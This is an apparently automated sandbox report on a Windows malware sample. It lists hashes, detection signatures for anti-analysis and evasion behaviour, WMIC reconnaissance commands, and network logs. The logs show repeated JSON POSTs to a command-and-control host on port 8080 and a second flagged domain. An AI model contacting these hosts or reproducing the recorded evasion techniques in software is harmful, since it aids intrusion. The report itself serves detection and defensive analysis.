Edit tour

Windows Analysis Report
1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Overview

General Information

Sample name:	1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe
Analysis ID:	1575960
MD5:	5b74ba5d3f7a0aff3dea2d3ae9bb1a59
SHA1:	e872b3d30b3da56ac0cafb905087d595c129d73b
SHA256:	b84745937d020b9750842b35590589aadf47153c995f266a3f44dae8b1ff51d8
Tags:	base64-decodedexeuser-abuse_ch
Infos:

Detection

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found API chain indicative of debugger detection

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains sections with non-standard names

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Communication To Uncommon Destination Ports

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe (PID: 6208 cmdline: "C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe" MD5: 5B74BA5D3F7A0AFF3DEA2D3AE9BB1A59)

WMIC.exe (PID: 3328 cmdline: wmic os get Name MD5: E2DE6500DE1148C7F6027AD50AC8B891)

conhost.exe (PID: 3548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 1928 cmdline: wmic cpu get name MD5: E2DE6500DE1148C7F6027AD50AC8B891)

conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 5084 cmdline: wmic path win32_VideoController get name MD5: E2DE6500DE1148C7F6027AD50AC8B891)

conhost.exe (PID: 3052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Sigma Signatures

Sigma detected: Communication To Uncommon Destination Ports

Source: Network Connection

Author: Florian Roth (Nextron Systems): Data: DestinationIp: 31.13.224.69, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, Initiated: true, ProcessId: 6208, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49737

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-16T12:18:21.489781+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	52.17.181.189	443	TCP
2024-12-16T12:18:23.502993+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	34.117.59.81	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://xweb.ddns.net:8080

Avira URL Cloud: Label: malware

Machine Learning detection for sample

Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Joe Sandbox ML: detected

Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DEBUG_STRIPPED

Source: unknown	HTTPS traffic detected: 52.17.181.189:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 4x nop then jmp 00EE15A0h		0_2_00F016A0
Source: C:\Users\user\Desktop\1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe	Code function: 4x nop then jmp 00EE15A0h		0_2_00F01651

Source: global traffic

TCP traffic: 192.168.2.4:49737 -> 31.13.224.69:8080

Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81
Source: Joe Sandbox View	IP Address: 34.117.59.81 34.117.59.81

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: unknown	DNS query: name: checkip.amazonaws.com
Source: unknown	DNS query: name: ipinfo.io

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 34.117.59.81:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 52.17.181.189:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: checkip.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ipinfo.io
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: checkip.amazonaws.com
Source: global traffic	HTTP traffic detected: GET /country HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: ipinfo.io

Source: global traffic	DNS traffic detected: DNS query: checkip.amazonaws.com
Source: global traffic	DNS traffic detected: DNS query: ipinfo.io
Source: global traffic	DNS traffic detected: DNS query: xscapezo.capetown

Source: unknown

HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/json; Charset=UTF-8Accept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 450Host: xscapezo.capetown:8080

Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.000000000158D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xscapezo.capetown:8080
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.000000000158D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xscapezo.capetown:8080/
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2687058268.000000000161C000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.000000000161C000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2672859368.000000000161C000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2687208163.000000000161F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xscapezo.capetown:8080/7
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.000000000161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xscapezo.capetown:8080/?
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.000000000158D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xscapezo.capetown:8080/P
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.000000000161C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xscapezo.capetown:8080/V
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2687132172.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2672949046.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.0000000001607000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2687184938.0000000001606000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xscapezo.capetown:8080/lR&F
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.000000000158D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xscapezo.capetown:8080/t
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2687132172.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2672949046.00000000015F7000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961318785.0000000001607000.00000004.00000020.00020000.00000000.sdmp, 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000003.2687184938.0000000001606000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://xscapezo.capetown:8080/yG
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xscapezo.capetown:80800
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xscapezo.capetown:80802.40
Source: 1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae2b13366.dat-decoded.exe, 00000000.00000002.2961622131.0000000001B50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://xscapezo.capetown:8080on3Microsoft
